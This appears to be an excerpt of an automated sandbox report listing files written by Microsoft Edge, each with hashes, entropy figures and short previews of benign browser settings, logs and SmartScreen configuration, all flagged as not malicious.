                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):419
                                                                                                                                                                                                                                                                Entropy (8bit):3.697458451967152
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuu/PsedhOE:lllc8zWrOuuuuuuuuuuuus8l
                                                                                                                                                                                                                                                                MD5:AA068476C16A3770D3ABC72F3C997CC6
                                                                                                                                                                                                                                                                SHA1:DD85A1896F26C9822903CEAB4C39F0E9125C7390
                                                                                                                                                                                                                                                                SHA-256:C02FB6242657931DE9E5F945CA295E84C9768B8FA0191F3ED45E6A416FD76DC6
                                                                                                                                                                                                                                                                SHA-512:A5DB8CC627B01EFB75F7DFA9AD0E834A1AA5E25F835C9F8054EC61C5FDF2C12CDF54386414F48A0856D098DA63813EB86433564D5CAF8A376C2560A98E9B6790
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.224924884181609
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A3Rdv+q2PCHhJ23oH+TcwtfrK+IFUt8OA3RdIWZmw+OA3RNiVkwOCHhJ23oH+Tp:7adv+vBYeb23FUt8OadIW/+OagV56Yet
                                                                                                                                                                                                                                                                MD5:FE337D30E21D18CF6F47AC635254D455
                                                                                                                                                                                                                                                                SHA1:3957B3C1FB08834FE372218B41890EE9A363DDE6
                                                                                                                                                                                                                                                                SHA-256:77D2FAB91438106E9BCE914BB5EC2E4573B422E3884AA2E81200470AE5912A44
                                                                                                                                                                                                                                                                SHA-512:483E10F1FEA7F1E6A626C83FDDBEDBF32BC723D2FB1DAED685C475AA9A0E3DE509C9F633D7D01918624F74755A9658EB7D8BBAAC4ED8D0E37DEC2B4E22119971
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.148 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-07:47:10.148 dec Recovering log #3.2024/12/16-07:47:10.149 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):753
                                                                                                                                                                                                                                                                Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                Entropy (8bit):5.184573808214086
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Al9+q2PCHhJ23oH+TcwtfrzAdIFUt8OAVXWZmw+OAViVkwOCHhJ23oH+Tcwtfrm:7c9+vBYeb9FUt8O6XW/+O6iV56Yeb2J
                                                                                                                                                                                                                                                                MD5:2BC4D8E68F720692B4830D7486BBCEF2
                                                                                                                                                                                                                                                                SHA1:C825D0C82236FBEE01EB9F0660CBBD5F55A699C9
                                                                                                                                                                                                                                                                SHA-256:62F0F937E24768CB52ACD7441484086D1E69F572B823E0BF37B12193228120AC
                                                                                                                                                                                                                                                                SHA-512:5667ED11743BCC6D5F1C69A8335A5C1E7D415456230A2BE071350CA77F2746D0BCC8916D0337E53E4D6C71999B0BD18EE4441A6227BCD7642ECDA3F0D4858623
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.045 dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-07:47:10.046 dec Recovering log #3.2024/12/16-07:47:10.046 dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:117.0.2045.47
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:uriCache_
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                Entropy (8bit):5.020121174339423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclR2zQWdM:YWLSGTt1o9LuLgfGBPAzkVj/T8lgzQaM
                                                                                                                                                                                                                                                                MD5:8D1853F54BCEFA2AFEBF2B1B815491D0
                                                                                                                                                                                                                                                                SHA1:68618EA3ACDBD40AC45A3F941ECAD6B4D741FA5D
                                                                                                                                                                                                                                                                SHA-256:F4249B280932C80A71105C5553FE79E38271D59652E7BCA877FA8D9D24115BE2
                                                                                                                                                                                                                                                                SHA-512:2E5B2A9AE2EBB402287E65FAABC4E6AF6B67F2B9A0FC6E3A9581E993D075698D92D90A78107270DD45A31946AC20EA312DEC3F2ABC29FF272EC81F8BDB47C747
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734454034238523}]}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):44621
                                                                                                                                                                                                                                                                Entropy (8bit):6.095774627812403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kN9LmZ0KabdzwVzE9A8KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynVTKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:4F31614D5BAD6107E1D4A0AC9A0FA590
                                                                                                                                                                                                                                                                SHA1:3A4398712C2A5AD7ECE1D1D289043DED565E71F3
                                                                                                                                                                                                                                                                SHA-256:14C283B1735AD278F1E5F3954E93F9126CAA99D2199368EE729A604289E78579
                                                                                                                                                                                                                                                                SHA-512:63FDEDF1552BAA87F070435B1B7F6B5151B2418E064B6853B13F5DF7B199EF70B3868B1C96F396AFEB9FC232DC1B04650A89471C180DF1718EED15C088BC05AF
                                                                                                                                                                                                                                                                Malicious:false
